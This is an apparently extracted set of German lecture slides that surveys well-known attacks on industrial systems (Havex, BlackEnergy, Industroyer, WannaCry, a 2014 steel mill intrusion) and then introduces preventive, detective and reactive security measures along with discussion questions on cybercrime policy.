IT
Zeit
Deutsch
es S
tahlw
erk
(Sab
otage
)
(2014)
Deutsch
es S
tahlw
erk
(Sab
otage
)
(2014)
DRAGONFLY / HAVEX RAT
44
Die Dragonfly Kampagne verwendete das HAVEX Remote Access Tool (HAVEX RAT)
Ca. 2000 Anlagen infiziert
Hauptsächlich Anlagen aus dem Bereich PT&D und Petrochemie
Angriff hatte „nur“ Spionage als Ziel Keine Unterbrechung der Produktion
Verwendung von OPC um Industrieanlagen auszuhorchen und zu kartografieren
Möglichkeit weitere Module und Funktionennachzuladen
Verbreitung über verschiedene Wege:
Spam Mails (Spear Phishing)
Watering Hole Attack: Austausch der Gerätesoftwareauf Webseiten der Hersteller
Hersteller in De, Fr und Ru betroffen
Remote Management Software
Kamera-Software (Mesa Imaging)
ICS Applikationen https://www.netresec.com/?page=Blog&month=2014-11&post=Observing-the-Havex-RAT
Hersteller-Server
SW Downloads)
OPC Server in Anlage
Integrator /
Wartung:
SW Update
???
BLACKENERGY 2
45
Blackenergy 2: Angriffe auf Industrieanlagen
Primärer Fokus: HMI
Siemens SIMATIC
GE SIMPLICITY
Advantech WebAccess
Angriff gegen HMI Systeme die mit dem Internet verbunden waren
Vorteil von Angriff auf HMI:
Parameter können verändert werden
Tatsächlicher Zustand der Anlage kann verschleiert werden
Angreifer hat direkte Kontrolle über Internet-Verbindung
SCADA Interface einer Pumpensteuerung (bei shodan.io gefunden)
Originaler BlackEnergy Builder von 2007, Quelle: F-Secure.com
BLACKENERGY 3 UND KIEW BLACKOUT 2015
46
Blackenergy 3 enthält keinen Schadcode der direkt Industrieanlagen angreift
Angriff über Büro Netzwerke der Energieversorger
Eindringen über Verbindungen zwischen Büro- und Produktionsnetzwerk
Zerstörung von PC Systemen in den Anlagen durch KillDisk Malware
Zerstörung von Seriell-zu-Ethernet Konvertern durch fehlerhafte Firmware
Im Dezember 2015 wurden 225.000 Haushalte durch Blackenergy 3 vom Strom abgeschnitten
Der Energieversorger benötigte 6 Stunden um die Anlagen wieder von Hand anzufahren
In manchen Anlagen musste bis zu einem Jahr ein Handbetrieb gefahren werden
Volle Automatisierung wurde erst nach einem Jahr wiederhergestellt
Umspannwerk, Quelle: Wikimedia[1]
STROMAUSFALL IN DER UKRAINE (23.12.2015):
47
E-Mails an Mitarbeiter des
Energieversorgers, mit der Werchowna
Rada als vermeintlichem Absender, dem ukrainischen Parlament.
Anhang: eine Word-Datei; Beim Öffnen
erschien die Meldung, die Word-Version sei veraltet, zum Aktualisieren müsse ein Makro
ausgeführt werden.
Makro installiert Black Energy 3
Malware. Anlage wird über
Büro Netz infiziert und gestört.
Hallo, hier
Parlament!
!!Zu alt!
Bitte
aktualisieren!
CRASHOVERRIDE / INDUSTROYER
48
Malware die spezifisch auf Industrieanlagen zugeschnitten ist
Ist in der Lage Schaltkreisunterbrecher in Umspannwerken und Kraftwerken zu manipulieren
Ziele in den Bereichen Energie-, Wasserversorgung und Verkehrssteuerung
Erfolgreicher Angriff (Test?) verursachten einen großflächigen Stromausfall für 75 Minuten in Kiew/Ukraine am 17. Dezember 2016
Siemens SIPROTEC Unterbrecher
Anonyme Kommunikation über TOR Netzwerk
Angriff auf Los Angeles Verkehrssteuerungssystem verursachte Staus
Adaptive Malware mit vielen Erweiterungen für Protokolle in Industrieanlagen
IEC 104, IEC 101, IEC 61850, OPC DA
Kraftwerk, Quelle:
Wikimedia
INDUSTROYER / CRASHOVERRIDE MALWARE
MAIN-BACKDOOR
Zusätzliches
Backdoor
Zusätzliche
ToolsMain-
Backdoor
Launcher
Data Wiper
101 Payload 104 Payload 61850 Payload OPC DA Payload
installiert kontrolliert
installiert
führt aus
führt aus
49Autor: Patrick Reck (HS-Albsig)
Einsatzbereit, falls die
Main-Backdoor
entdeckt wurde
Löscht Registry-Schlüssel, überschreibt
Dateien, verwischt Spuren der Angreifer
führt aus
Überwacht
und
kontrolliert
elektrische
Systeme
Kann von den
Angreifern
stark
angepasst/konfi
guriert werden
Erzeugt eine
Liste aller
relevanten
Geräte des
Systems
Ermöglicht
den Austausch
und
Veränderung
der im System
vorhandenen
Komponenten
WANNACRY / WANNACRYPTOR
50
Ransomware Wannacry
Infektion von ungeschütztenWindows Systemen (bisWindows 7) weltweit
Große Schäden in Industrie-Anlagen, Transportwesen,etc.
Malware dringt in Intranetder Firma ein und verbreitetsich von dort aus aufSysteme die nicht aus demInternet erreichbar sind
Spezialsysteme (Kassensysteme,Geldautomaten, Anzeigen, …)aufgrund schlechtem Patch-Standbesonders betroffen
Nettes Detail: Der Angriff stammt aus demArsenal der amerikanischen Geheimdiensteund wurde 5 Jahre lang unbemerkt genutzt
Ca. 3000 Infektionen vonIndustrie-Anlagen mitgewöhnlicher Malwarejährlich (https://dragos.com/blog/mimics/)
Anzeigetafeln bei der Deutschen Bahn:
Geldautomaten in China:
WANNA CRY - ÜBERSICHT
51
Hintergrund:
Veröffentlichungen auf Wiki Leaks über Schwachstellen im
Windows Betriebssystem namens Eternalromance, -blue, -
synergy.
Höchst wahrscheinlich wurde Microsoft von der CIA über
entwendete Zero Day Exploits gewarnt.
12. März 12. Mai14. April 13.Mai
▪ Microsoft stellt
vorsorglich einen
Sicherheitspatch für
unterstützte
Systeme zur
Verfügung
▪ Veröffentlichung
detaillierter Exploit
Anleitungen
▪ Experten warnen
vor einem baldigem
großangelegtem
Angriff
▪ Erste Maleware unter
Verwendung der
veröffentlichten
Schwachstelle
Eternalblue infiziert
ein Krankenhaus in
Großbritanien,
ihr Name WannaCry
▪ Ein entdeckter
,,Kill-switch‘‘
stoppte weitere
Verbreitung in
Netzwerken
▪ Microsoft verteilt
nachträglich
kostenlose Updates
für XP
Quelle: Heise-Security[1]
Autor: Daniel Grimm (HS-Albsig)
AUSWIRKUNGEN VON WANNACRY
52
147 Varianten von WannaCry wurden gefunden (Quelle: AV Test)
Schaden geht in die Milliarden
Krankenhäuser in GB mussten Betrieb einschränken
Ausfall der Fahrkartenautomaten und Anzeigetafeln der DB
Innenministerium in Russland meldete 1.000 infizierte Rechner
Renault stoppt Produktion in einigen Werken
Nissan Werk Sunderland wurde infiziert
Tankstellen und Geldautomaten in China konnten keine Transaktionen durchführen
Telefónica, FedEx, Stahlkonzern Sandvik und viele weitere Betriebe betroffen
Nur ca. 30.000 EUR Lösegeld erzielt
War das Ziel wirklich das Lösegeld?
DEUTSCHES STAHLWERK 2014
53
Erwähnung in BSI Lagebericht 2014
Um welches Stahlwerk es sich handelt, wird nicht
genannt.
Der Vorfall blieb zunächst komplett geheim.
Er wurde erst mit dem Lagebericht 2014 des
Bundesamts für Sicherheit in der Informationstechnik
bekannt.
Der Angriff führte dazu, dass ein Hochofen nicht
mehr kontrolliert heruntergefahren werden konnte
Die gesamte Anlage wurde schwer beschädigt
Die genauen Schäden und Einzelheiten des Vorfalls
wurden nicht veröffentlicht
Hochofen, Quelle: Wikipedia
VORGEHENSWEISE DER ANGREIFER (LAUT BSI)
Erstellung einer gefälschten
Webseite mit Login Feldern
Mail an Service-Firma, mit dem
Link zur gefälschten Webseite
Erhalt der Zugangsdaten des
Service-Technikers
Zugriff auf das Stahlwerk mit den
Anmeldedaten des
Servicetechnikers
Autor: Simon Luib (HS-Albsig)
Hierbei wird
angegeben, man sei
Kunde der Servicefirma
und die Anlage habe ein
Problem
Der Techniker wird
auf die original Seite
umgeleitet, um
keinen Verdacht zu
schöpfen
54
Secure
Stahl
Benutzername
******* Hilfe
Problem!
Secure
Stahl
Max Muster_
Sunshine
!!
… UND MIT INDUSTRIE 4.0?
55
Kundenspezifische Produktion:
Kunden können ihre eigenen Kekse bestellen?
Wandelbare Produktion:
Neue Zusammenstellung von Maschinen und Abläufen
Stichwort Plug & Produce
Wertschöpfungsnetzwerke
Engere operative Zulieferer – Produzenten-Beziehungen
Kommunikation über Unternehmensgrenzen
Kommunikation über Standortgrenzen
Dienstleister in der Fertigung
Firma A
Firma BFirma C
++
…UND WIE IST DAS MIT INDUSTRIE 4.0?
TSN(IEEE Echtzeit
Ethernet)
Internet
Pub/Sub
OPC-UA
MES
ERP
SCADA
SPS
Feldgeräte
Automatisierungspyramide Industrie 4.0 Kommunikation
Cloud
Partner
Local
Cloud
Unternehmensebene
Betriebsleitebene
Prozessleitebene
Steuerungsebene
Feldebene
Gefahren
EVOLUTION UND VERFEINERUNG DER ANGRIFFSWERKZEUGE
57
Zeit…. 1990 1995 2000 2005 2010 2015 Heute
Ars
enal
der
Angr
eifer
/
Vie
lfal
t der
Angr
iffe
/
Notw
endig
e V
ert
eid
igung
TYPISCHE ANGRIFFSWEGE IN EINER INDUSTRIE-ANLAGE
58
Internet
Feldebene
Kontroll LAN
Infizierter
Laptop
Fehlende Zonierung
Fehlende Zonierung /
Fehlende ACLs /
Fehlende NAC
Unzureichende
Isolation
drahtloser
Netzwerke
Schatten IT /
schlecht
gesicherte
Modems /
WLANs
Fehlende Zonierung
Infizierter
Rechner
Infizierte USB
Sticks
Fehlende NAC
Unauthorisierte
Verbindungen
Ungeschützte
Netzwerk
Laufwerke
(z.B. mit Software /
Updates)
Watering hole Attack
Fabrik
Netz
3rd
Party
3rd Party
Probleme
Office
LAN
Infizierter
Remote
Access
Unverschlüsselte
Kommunikation
zwischen OPC
Server/Client
Fehlende Benutzer-
Authentifizierung
ENTWERFEN SIE EIN HORROR SZENARIO FÜR
DEUTSCHLAND!
59Photo credit: chiaralily on VisualHunt / CC BY-NC
Was kann passieren?
Entwerfen Sie ein Horror-
Szenario für ein Unternehmen
oder für ganz Deutschland!
WAS KANN PASSIEREN?
60
Eine beunruhigende Abschätzung
Studie des TAB (Büro für Technikfolgenabschätzung)
Lesenswert: Buch Blackout, Marc Elsberg
Verkehr und Transport
Versagen der Versorgung mit Benzin
Privater und öffentlicher Verkehr kommt zum Erliegen
Verkehrssteuerung funktioniert nicht
Versorgung der Bürger
Zusammenbruch der Lieferketten, Verderbliche Güter verderben
Mangelnder Transport (Schiffe, LKW, …)
Wasserversorgung und Entsorgung bricht zusammen
Nachschub an Medikamenten nicht gesichert
Krankenhäuser und Heime müssen Betrieb einstellen
Heizung funktioniert nicht
Wirtschaft und Finanzen
Firmen können nicht operieren und gehen pleite
Nutztieren (z.B. Kühe) sterben aufgrund fehlender Automatisierung
Geld wird knapp und verliert Bedeutung – Markt versagt
Kommunikation
Informationsfluss zu Bürgern versiegt
Irrationales Verhalten der Bürger
https://www.tab-beim-bundestag.de/de/pdf/publikationen/berichte/TAB-Arbeitsbericht-ab141.pdf
DIE WELT IST SCHLECHT UND
UNSICHER – UND JETZT?VERTEIDIGUNG IST DIE BESTE VERTEIDIGUNG!
Photo credit: arkad83 on Visualhunt.com / CC BY
WIE MACHT MAN COMPUTER, NETZWERKE UND
FIRMEN SICHER?
Verschiedene Sicherheitsmaßnahmen wirken auf unterschiedliche
Art und Weise:
Präventiv:
Gute Passwörter, aktuelle Software, Anti-Virus, Schulungen, …
Detektierend
Intrusion Detection System, Systemüberwachung, Kontrolle
Reaktiv
Incident Response Team, Anti-Virus, Intrusion Prevention System
62Photos on Visualhunt https://visualhunt.com/re/d04967 , DocChewbacca on Visualhunt / CC BY-NC-SA,
Jay Phagan on VisualHunt.com / CC BY
NACHHALTIGE SICHERHEIT PDCA (THEORIE)
63
PLAN
DO
CHECK
ACT
NACHHALTIGE SICHERHEIT PDCA (REALITÄT)
64
PLAN(something)
DO
(little)
CHECK(nothing)
ACT
(never / too late)
IT SECURITY IST VIELFÄLTIG
65
Systemsicherheit
Sicherheitsmaßnahmen von Computersystemen richtig verstehen und anwenden
Computer sicher konfigurieren und einsetzen
Netzwerksicherheit
Sichere Kommunikationsnetzwerke entwerfen
(Sichere) Kommunikationsprotokolle verstehen und richtig verwenden
Offensive Sicherheit
Hacken, um Hacker zu verstehen
Sicherheit bestehender Systeme prüfen
Sicherheitsorganisation / Sicherheitsmanagement
Sicherheit in ein ganzes Unternehmen bekommen
Faktor Mensch bei der Sicherheit einbeziehen
66
PRÄVENTIVE
SICHERHEITSMASSNAHMENVERHINDERN VON ANGRIFFEN
SICHERHEIT AM BEISPIEL BURG
67
2er Gruppen mit ihrem Nachbarn. Sammlung im Plenum.
Dies ist Ihre Burg! Gestalten Sie ein Sicherheitskonzept! Sie sind die
Experten
Welche Sicherheitsmaßnahmen planen Sie? Wie passen diese zusammen?
Hauptburg Burghausen, Bayern; Quelle: Wikimedia
WIE ENTWIRFT MAN EINE GUTE BURG?
Kombination verschiedenerunabhängiger Sicherheits-mechanismen
Ein Angreifer muss mehrere/alle Mechanismen überwinden
Ein Fehler in einem Mechanismus gefährdet nicht das Gesamtsystem
Unterteilung eines Systems in voneinander getrennte Bereiche
Angreifer kann sich nach Eindringen in einen Bereich nicht frei bewegen
DEFENSE-IN-DEPTH IN EINEM IT NETZWERK
69
Der Angreifer muss mehrere
unabhängigeVerteidigungs-
mechanismen umgehen
Die Überwindung eines einzigen
Mechanismus führt nicht zum Ziel
In der IT Security: Kombination von
Mechanismen aus den Bereichen
Netzwerksicherheit und
Systemsicherheit
Abbildung rechts zeigt ein Beispiel
für die Umsetzung einer DiD
Strategie
Outer Firewall
Inner Firewall
Personal Firewall
Virus Protection
Application
Whitelisting
Intrusion
Detection
System
Updates/
Patches
Internet
Victim
Application
DMZ
Intranet
Close Vuln’s
Detect Attacks
DiD Implementierung in
einem Beispielnetzwerk
70
DETEKTIERENDE
SICHERHEITSMASSNAHMENERKENNUNG VON ANGRIFFEN
Photo on https://visualhunt.com/re/d04967 VisualHunt.com
REICHT DAS? NEIN! SECURITY MONITORING
• IT Systeme sind komplex und
beinhalten viele Einzelkomponenten
• Ohne zentrale Erfassung von
Ereignissen und Systemzuständen
können Abweichungen vom Soll-
Zustand und Angriffe nicht erkannt
werden
• Reaktive Maßnahmen können erst
sehr spät (oder eben zu spät) wirken
99 Tagelang wurden Angriffe in einem
kompromittierten System im
Durchschnitt nicht entdeckt.(Studie FireEye, 2016 – M-Trends 2017)
47% der kompromittierten Firmen waren
nicht in der Lage die Angriffe zu
entdecken sondern mussten zuerst
von Dritten auf die Angriffe
hingewiesen werden.(Studie FireEye, 2016 – M-Trends 2017)
HIGH INTERACTION HONEYPOT
72
Virtueller High-Interaction Honeypot / Honeynet an unserer Hochschule
Von Studenten im Projektstudium aufgesetzt
Go-live im internen Testbetrieb: April 2017
… mal schauen was daraus wird!
Eingesetzte Software:
VirtualBox zur Virtualisierung
Security Onion als Honeywall
Windows und Linux Systeme
Apache Webserver
MySQL Datenbank
Eigene Web-Applikation + z.T. Logverwaltung
Verwundbare Web-Applikation des Hochschul-Honeynets
… NACH WENIGEN MINUTEN
73
HONEYNET AUFBAU
74
75
REAKTIVE SICHERHEITSMASSNAHMENWIEDERHERSTELLUNG DES SICHEREN URSPRUNGSZUSTANDS
REAKTION – INCIDENT RESPONSE / FORENSIK
Erkennung mit welchen Teilen des
Systems ein Angreifer interagiert hat
Veränderungen erkennen und weitere
Veränderungen und Datenabfluss
unterbinden
Schließen der Sicherheitslücken, die
zum Angriff geführt haben
Incident Response
Reaktion auf einen Eindringling
IT-Forensik
Sichern von Beweisen (ggf. gerichtsfest)
76
BSI Lagezentrum. Quelle: BSI
Quelle: BSI
WIEDERHERSTELLEN DES URSPRUNGSZUSTANDS
77
Erneutes Aufsetzen von Systemen
Wiedereinspielen von Backups
Voraussetzung: regelmäßige, vollständige, lang verfügbare
Backups
Schwer vereinbare Voraussetzungen:
Vollständige Backups Viel Speicher
Aktuelle Backups Viele Backups mit viel Speicher
Lange verfügbare Backups Viele Backups die lange viel
Speicher belegen
Clevere Methoden zur effizienten Sicherung und
Wiederherstellung von Daten!
Bandlaufwerke und Tapes:
Tape-Bibliothek:
Bildquelle:Wikimedia
WAS MUSS SICH ÄNDERN?
78
Technik muss anders gedacht werden
Security nicht als Add-On
Secure by Default
Menschen müssen bereit sein für Security Geld auszugeben
Keine alles-umsonst Mentalität bei Security
Selbstschutz kostet etwas
Firmen müssen mehr Verantwortung übernehmen
Haftung bei schwerwiegenden Versäumnissen
Pflicht zur sicheren Entwicklung
Staatliche Vorgaben und Unterstützung
Beratung der Bürger
Security in der Schule
Gesetze und Verordnungen zur Umsetzung von Sicherheit wenn der Markt das nicht tut
Neue Ausbildungsinhalte
IT Sicherheit und Prozesse
Netzwerke, Netzwerksicherheit
Betriebssysteme, Systemsicherheit
Offensive Sicherheit
Forensik
Kryptografie
Neue Berufsbilder:
Security Analyst
IT Security Officer (ISO)
Security Engineer (Entwickler)
Security - Auditor
Penetrationstester
DISKUSSIONSBEREICHE
79
Bürger
(Individuum)
Staat
(Legislative)- Gesetze
- Verordnungen
Staat
(Exekutive)- Polizei
- Kontrolle
Firmen-Produkte
-Produkt-
entwicklung
- Support
- Kommunikation
Internet
Provider- Filter
- Zentrale Technik
- Überwachung?
Cybercrime
Photo on https://visualhunt.com/re/18f472 VisualHunt
FRAGESTELLUNGEN
80
Welche Rolle sollten die einzelnen Akteure in der Bekämpfung und Vermeidung der
Cyber-Kriminalität und von Cyber-Angriffen spielen?
Welche Untergrenzen (muss gemacht werden) und welche roten Linien (kann nicht
mehr erwartet werden, darf nicht gemacht werden) gibt es?
Wer sollte Verantwortung bei einem Cyber-Zwischenfall tragen? Wer trägt
Verantwortung bei einer „normalen“ Straftat?
Was ist im Kampf gegen Cybercrime rechtlich und ethisch vertretbar? Wie sehen
ethische Grenzen aus? Wann sollten/können Ethische Grenzen verletzt werden?
Welche Auswirkungen haben Cybersecurity-Maßnahmen:
Auf die Benutzbarkeit von Produkten?
Auf die Preise von Produkten?
Auf die Wettbewerbsfähigkeit von Firmen?
Auf die Innovationsfähigkeit von Firmen?
MALWARE IM DARKNET
81
Ist freie Kommunikation im Internet ein Nachteil bei der Bekämpfung von
Cybercrime?
Welche Vor-Nachteile bietet das Darknet für Aktivisten aber auch Cyber-Kriminelle?
Kann und sollte man das Darknet stärker regulieren?
Sollte man es verbieten?
AUFKLÄRUNG DURCH DIE POLIZEI?
82
Was darf die Polizei?
Was darf sie nicht?
Wie sollte man Privatsphäre und freie Meinungsäußerung gegen Cybersicherheit
gewichten?
Kann man Maßnahmen gegen Kriminelle und Maßnahmen gegen Bürger voneinander
trennen? Wo geht das? Wo geht das nicht?
CYBERWAR UND KRIEG
83
Photo credit:The U.S. ArmyonVisual Hunt/CC BY
ZUSAMMENFASSEND: DIE SACHE MIT DER IT SICHERHEIT
84
IT Security ist ein Katz- und Maus- Spiel zwischen Angreifern und Verteidigern
Neue Angriffe Neue Verteidigung Neue Angriffe
Die Ausgangslage ist nicht besonders günstig
Verteidigung: alle Teile eines Systems müssen zu jeder Zeit sicher sein
Angriff: es genügt wenn ein Teil eines Systems momentan unsicher ist
Es gibt keine Wunderwaffen in der IT Sicherheit
Mitdenken ist gefragt!
Was ist das Allerwichtigste wenn man
sein Rad vor Diebstahl schützen will?
Gesunder Menschenverstand!